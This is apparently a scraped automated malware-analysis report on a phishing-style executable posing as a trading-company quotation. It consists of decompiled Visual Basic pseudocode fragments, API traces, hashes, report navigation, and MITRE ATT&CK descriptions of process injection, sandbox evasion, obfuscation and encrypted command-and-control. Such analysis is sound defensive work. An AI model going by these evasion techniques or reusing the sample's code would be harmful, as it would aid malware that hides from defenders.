__vbaHresultCheckObj.MSVBVM60(00000000,?,00402808,00000014,?,?,?,?,?,?,?,?), ref: 00412487
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402828,00000058,?,?,?,?,?,?,?,?), ref: 004124C2
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?), ref: 004124E0
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?), ref: 004124E8
__vbaFreeVar.MSVBVM60(0041251F,?), ref: 00412511
__vbaFreeStr.MSVBVM60(0041251F,?), ref: 00412519

Strings

<CA, xrefs: 00412458

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#562ChkstkMoveNew2
String ID: <CA
API String ID: 2183228509-146778150
Opcode ID: 73e89bca7826639f4753d1f2b2edbc606ddddd408e3036f338f476d8caa404d4
Instruction ID: a3b625d1c4105b5073d1462e5390a6e7c69ab9ace3499f92745c6ab5e5c50844
Opcode Fuzzy Hash: 73e89bca7826639f4753d1f2b2edbc606ddddd408e3036f338f476d8caa404d4
Instruction Fuzzy Hash: 7241047190024CAFDB10EFE5CA85ADDBBB4AF08704F20812AE805BB2A1D7785995CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00412546, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00412546(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				char _v80;
				signed int _v84;
				signed int _v88;
				signed int _t46;
				signed int _t50;
				signed int _t56;
				void* _t70;
				void* _t72;
				intOrPtr _t73;

				_t73 = _t72 - 0xc;
				 *[fs:0x0] = _t73;
				L004011D0();
				_v16 = _t73;
				_v12 = 0x401170;
				_v8 = 0;
				_t46 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x4011d6, _t70);
				L004012CC();
				L0040128A();
				L0040133E();
				_push(_t46);
				_push(L"pointoptllingers");
				L004012A2();
				asm("sbb eax, eax");
				_v56 =  ~( ~_t46 + 1);
				L00401302();
				_t50 = _v56;
				if(_t50 != 0) {
					if( *0x41433c != 0) {
						_v80 = 0x41433c;
					} else {
						_push(0x41433c);
						_push(0x402818);
						L0040132C();
						_v80 = 0x41433c;
					}
					_t15 =  &_v80; // 0x41433c
					_v56 =  *((intOrPtr*)( *_t15));
					_t56 =  *((intOrPtr*)( *_v56 + 0x1c))(_v56,  &_v52);
					asm("fclex");
					_v60 = _t56;
					if(_v60 >= 0) {
						_v84 = _v84 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x402808);
						_push(_v56);
						_push(_v60);
						L00401326();
						_v84 = _t56;
					}
					_v64 = _v52;
					_t50 =  *((intOrPtr*)( *_v64 + 0x50))(_v64);
					asm("fclex");
					_v68 = _t50;
					if(_v68 >= 0) {
						_v88 = _v88 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x402938);
						_push(_v64);
						_push(_v68);
						L00401326();
						_v88 = _t50;
					}
					L00401320();
				}
				_push(0x41268f);
				L0040131A();
				return _t50;
			}

0x00412549
0x00412558
0x00412562
0x0041256a
0x0041256d
0x00412574
0x00412583
0x0041258c
0x00412591
0x0041259b
0x004125a0
0x004125a1
0x004125a6
0x004125ad
0x004125b2
0x004125b9
0x004125be
0x004125c4
0x004125d1
0x004125eb
0x004125d3
0x004125d3
0x004125d8
0x004125dd
0x004125e2
0x004125e2
0x004125f2
0x004125f7
0x00412606
0x00412609
0x0041260b
0x00412612
0x0041262b
0x00412614
0x00412614
0x00412616
0x0041261b
0x0041261e
0x00412621
0x00412626
0x00412626
0x00412632
0x0041263d
0x00412640
0x00412642
0x00412649
0x00412662
0x0041264b
0x0041264b
0x0041264d
0x00412652
0x00412655
0x00412658
0x0041265d
0x0041265d
0x00412669
0x00412669
0x0041266e
0x00412689
0x0041268e

APIs

__vbaChkstk.MSVBVM60(?,004011D6), ref: 00412562
__vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 0041258C
#669.MSVBVM60(?,?,?,?,004011D6), ref: 00412591
__vbaStrMove.MSVBVM60(?,?,?,?,004011D6), ref: 0041259B
__vbaStrCmp.MSVBVM60(pointoptllingers,00000000,?,?,?,?,004011D6), ref: 004125A6
__vbaFreeStr.MSVBVM60(pointoptllingers,00000000,?,?,?,?,004011D6), ref: 004125B9
__vbaNew2.MSVBVM60(00402818,0041433C,pointoptllingers,00000000,?,?,?,?,004011D6), ref: 004125DD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402808,0000001C), ref: 00412621
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402938,00000050), ref: 00412658
__vbaFreeObj.MSVBVM60(00000000,?,00402938,00000050), ref: 00412669
__vbaFreeVar.MSVBVM60(0041268F,pointoptllingers,00000000,?,?,?,?,004011D6), ref: 00412689

Strings

<CA, xrefs: 004125F2
pointoptllingers, xrefs: 004125A1

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#669ChkstkMoveNew2
String ID: <CA$pointoptllingers
API String ID: 256872743-2660778481
Opcode ID: 8b06daf9a91255693f0f4f00423b5d2c486812a2a8643febb4334a87e71edcec
Instruction ID: e0401b45ac540eaf86dbb84ceba5c66f6209b34825669c9bda369bcd55e885fe
Opcode Fuzzy Hash: 8b06daf9a91255693f0f4f00423b5d2c486812a2a8643febb4334a87e71edcec
Instruction Fuzzy Hash: CC31F471A40208AFDB04EFA5DA45BDDBBB5FF18704F10802AF401BA2E1DBB859558B59

Uniqueness

Uniqueness Score: -1.00%

Function 02290D83, Relevance: 5.2, Strings: 4, Instructions: 238COMMON

Download Yara Rule

Strings

#T, xrefs: 02290E70
P-o, xrefs: 0229114F
ur, xrefs: 02290E08
M, xrefs: 022911AE

Memory Dump Source

Source File: 00000000.00000002.1738300615.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Similarity

API ID:
String ID: M$P-o$#T$ur
API String ID: 0-1296793507
Opcode ID: 32cfa21bdaa36bdcceab648687df73818f60fd1a0e700de8a7c42b2594780d6e
Instruction ID: be11cd67454ac12ae708b57d8fc3a01d424297838d2a4cf17edc1a8d8dd7d513
Opcode Fuzzy Hash: 32cfa21bdaa36bdcceab648687df73818f60fd1a0e700de8a7c42b2594780d6e
Instruction Fuzzy Hash: 5C61C0707643466AEF3219E4C9783EA33976FC3370F78413DDC869B299DBE585498602

Uniqueness

Uniqueness Score: -1.00%

Function 02290D32, Relevance: 5.2, Strings: 4, Instructions: 231COMMON

Download Yara Rule

Strings

#T, xrefs: 02290E70
P-o, xrefs: 0229114F
ur, xrefs: 02290E08
M, xrefs: 022911AE

Memory Dump Source

Source File: 00000000.00000002.1738300615.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Similarity

API ID:
String ID: M$P-o$#T$ur
API String ID: 0-1296793507
Opcode ID: 384dab8b2f5bf2830814b0d241a06e6bf1392d7368e8916033d244e4f0591971
Instruction ID: 36df401e59178458b35dc825258e46ecf57d132ebb88d5d7784663c80b770f94
Opcode Fuzzy Hash: 384dab8b2f5bf2830814b0d241a06e6bf1392d7368e8916033d244e4f0591971
Instruction Fuzzy Hash: ED51AB7066430A66EF211AE4C9783EE23979FC33B0F78412DEC875B589DFE9D5468602

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe PID: 5136 Parent PID: 5980

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe PID: 5136 Parent PID: 5980 JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exeCOMMON

Executed Functions

Function 00410F34, Relevance: 144.4, APIs: 76, Strings: 6, Instructions: 921COMMON

Function 00412019, Relevance: 79.0, APIs: 37, Strings: 8, Instructions: 233COMMON

Function 00410F34, Relevance: 144.4, APIs: 76, Strings: 6, Instructions: 921
COMMON

Function 00412019, Relevance: 79.0, APIs: 37, Strings: 8, Instructions: 233
COMMON

Function 0041293B, Relevance: 7.5, APIs: 5, Instructions: 35
COMMON

Function 0040135C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14
COMMON

Function 00402F88, Relevance: 5.8, Strings: 4, Instructions: 802
COMMONCrypto

Function 004129C5, Relevance: 33.2, APIs: 22, Instructions: 168
COMMON

Function 004126B6, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 165
COMMON

Function 004123A0, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 108
COMMON

Function 00412546, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 94
COMMON